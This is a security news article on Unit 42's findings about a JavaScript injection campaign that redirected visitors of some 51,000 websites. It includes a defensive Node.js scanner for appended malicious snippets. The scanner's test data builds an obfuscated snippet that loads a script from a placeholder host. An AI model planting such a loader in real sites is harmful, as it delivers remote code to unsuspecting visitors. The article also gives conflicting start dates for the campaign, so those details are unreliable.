Saturday, January 25, 2025

Hackers Inject Weaponized JavaScript (JS) on 51,000 Websites

Researchers from Unit 42 have been monitoring a widespread campaign of harmful JavaScript (JS) injections. The campaign aims to redirect unsuspecting victims to dangerous content, including adware and fraudulent pages.

The campaign was active throughout 2022, and websites continue to be infected in 2023. The malicious JS code was discovered on over 51,000 websites, several hundred of which appear in Tranco’s top 1 million ranked websites.

The potential impact of this campaign is significant, as the presence of affected websites in Tranco suggests a widespread reach.

The campaign’s complexity lies in its multi-stage injection process, which precedes the redirect to harmful web pages; obfuscation and benign append attacks were employed as additional means of evading detection.

Impact of the campaign on users

Experts have identified multiple versions of a campaign in which threat actors inject malicious JS code into websites. The campaign was first observed in 2020.

170,000 URLs and 51,000 hostnames have been identified as part of this campaign since its inception in 2022.

The campaign peaked between May and August 2022, generating over 4,000 URLs per day.

The impact of this campaign has been substantial, with hundreds of infected websites appearing in Tranco’s top one million ranked sites, indicating a potentially wide reach among internet users.

In January 2023, blocking these websites prevented approximately 240,000 website sessions across 14,773 devices.

Technical analysis

The injected JS code hides a malicious payload and is obfuscated to evade detection. The obfuscation also conceals the URL from which the malicious JS is loaded.

The injected code then dynamically adds the external malicious JS to the page’s DOM.

On certain websites, obfuscated JS snippets were observed injected into commonly used utility JS files. Appending malicious code to large sections of benign code, known as a benign append attack, is a common tactic malware authors use.

The technique helps the malicious code avoid detection by security crawlers. In each variant of the snippet, the injected JS code appends external malicious JS through DOM manipulation.

Because the payload is hosted externally, the attacker can change it at any time, which provides greater flexibility. In its more recent version, this campaign injects malicious JS code directly into a website.
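The observations above (an obfuscated snippet appended to a legitimate utility file, which creates a script element, points it at an external URL and appends it to the DOM) translate into a simple defensive check. The following Node.js scanner is an added example, not code from Unit 42 or from this article. It inspects the tail of a JS asset for three independent signals: a decoded create/src/append chain, a high density of `\x`/`\u` escapes, and references to hosts outside an allowlist. The sample utility file and appended tail are constructed for the demonstration (the host `example.invalid` is a placeholder), and the thresholds (`tailChars`, the 20% escape density, two findings for "suspicious") are assumptions to tune per site.

```javascript
// Added example (not code from Unit 42 or this article): a heuristic scanner
// for "benign append" injections, where an obfuscated snippet that loads an
// external script through DOM manipulation is tacked onto a legitimate utility
// JS file. Thresholds and patterns below are assumptions for the demo.

// Builds hex-escaped string content; used only to construct a realistic-looking
// obfuscated sample for the demonstration (constructed, not a real payload).
const hexEsc = (s) =>
  [...s].map((c) => "\\x" + c.charCodeAt(0).toString(16).padStart(2, "0")).join("");

// Constructed benign utility file (stands in for the site's own helper library).
const SAMPLE_UTILITY = [
  "// site helper library (constructed sample)",
  "function debounce(fn, ms) {",
  "  var t; return function () { clearTimeout(t); t = setTimeout(fn, ms); };",
  "}",
  "function $(sel) { return document.querySelector(sel); }",
].join("\n");

// Constructed appended tail: creates a <script>, points it at a placeholder
// host (example.invalid) and appends it, with names hidden behind \x escapes.
const SAMPLE_APPENDED_TAIL =
  `var _a=document["${hexEsc("createElement")}"]("${hexEsc("script")}");` +
  `_a["${hexEsc("src")}"]="${hexEsc("https://example.invalid/t.js")}";` +
  `document["${hexEsc("head")}"]["${hexEsc("appendChild")}"](_a);`;

const SAMPLE_INFECTED = SAMPLE_UTILITY + "\n" + SAMPLE_APPENDED_TAIL;

// \x41 / \u0041 escapes inside string literals.
const ESCAPE_RE = /\\x[0-9a-fA-F]{2}|\\u[0-9a-fA-F]{4}/g;

// The three steps of DOM-based script injection, matched on decoded text so
// that both dot and bracket property access are caught.
const DOM_INJECT_PATTERNS = [
  /createElement\W*\(\s*["'`]script["'`]\s*\)/,
  /(\.src|\[\s*["']src["']\s*\])\s*=/,
  /(appendChild|insertBefore)\W*\(/,
];

// Resolve \x and \u escapes so the analyst sees what the snippet references.
function decodeEscapes(text) {
  return text.replace(ESCAPE_RE, (m) => String.fromCharCode(parseInt(m.slice(2), 16)));
}

function scanJs(src, opts = {}) {
  const tailChars = opts.tailChars ?? 400; // how much of the file end to inspect
  const allowedHosts = new Set(opts.allowedHosts ?? []);
  const tail = src.slice(Math.max(0, src.length - tailChars));
  const decoded = decodeEscapes(tail);

  const escapeMatches = tail.match(ESCAPE_RE) || [];
  const escapes = escapeMatches.length;
  const escapeDensity =
    escapeMatches.reduce((n, m) => n + m.length, 0) / Math.max(1, tail.length);
  const domHits = DOM_INJECT_PATTERNS.filter((re) => re.test(decoded)).length;
  const urls = decoded.match(/https?:\/\/[^\s"'`;)]+/g) || [];

  // Hosts the snippet loads from that are not the site's own.
  const externalHosts = [];
  for (const u of urls) {
    try {
      const h = new URL(u).hostname;
      if (!allowedHosts.has(h)) externalHosts.push(h);
    } catch {
      // not a parseable URL; ignore
    }
  }

  const findings = [];
  if (domHits === 3) findings.push("tail creates, sources and appends a <script> element");
  if (escapeDensity > 0.2) findings.push(`escapes cover ${Math.round(escapeDensity * 100)}% of the tail`);
  if (externalHosts.length) findings.push(`tail references external host(s): ${externalHosts.join(", ")}`);

  // Requiring two independent signals keeps a single legitimate lazy-loader from firing.
  return { domHits, escapes, escapeDensity, urls, externalHosts, findings, suspicious: findings.length >= 2 };
}

console.log(scanJs(SAMPLE_UTILITY).findings);  // [] for the clean file
console.log(scanJs(SAMPLE_INFECTED).findings); // three findings for the appended tail
```

Run it over every `.js` asset served by the site, passing the site's own CDN hostnames in `allowedHosts`; a file that scores `suspicious` after a CMS or plugin update is a candidate for diffing against the vendor's original. Only the tail is scored because, as described above, the snippet is appended after a long run of benign code precisely so that whole-file statistics look normal.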

When the final payload executes, users are redirected through several websites before landing on a destination page, which often consists of adware or a fraudulent page.

This page displays false information that may deceive visitors into granting an attacker-controlled website permission to send browser notifications.

The researchers at Unit 42 believe that many websites are susceptible to security breaches due to vulnerabilities in one or more CMS plugins.

The researchers at Sucuri have discovered that exactly the same technique was used to exploit CMS plugins in a similar campaign. The threat actors behind the malware have produced multiple variants of the harmful JavaScript code injected into websites during this campaign.

Detecting different variants of the same attack is a strength of the deep learning techniques often used for intrusion detection.

Deep learning techniques could therefore be applied to increase the detection rate of malicious JS injections and help prevent them.


Balaji

BALAJI is an Ex-Security Researcher (Threat Research Labs) at Comodo Cybersecurity. Editor-in-Chief & Co-Founder - Cyber Security News & GBHackers On Security.
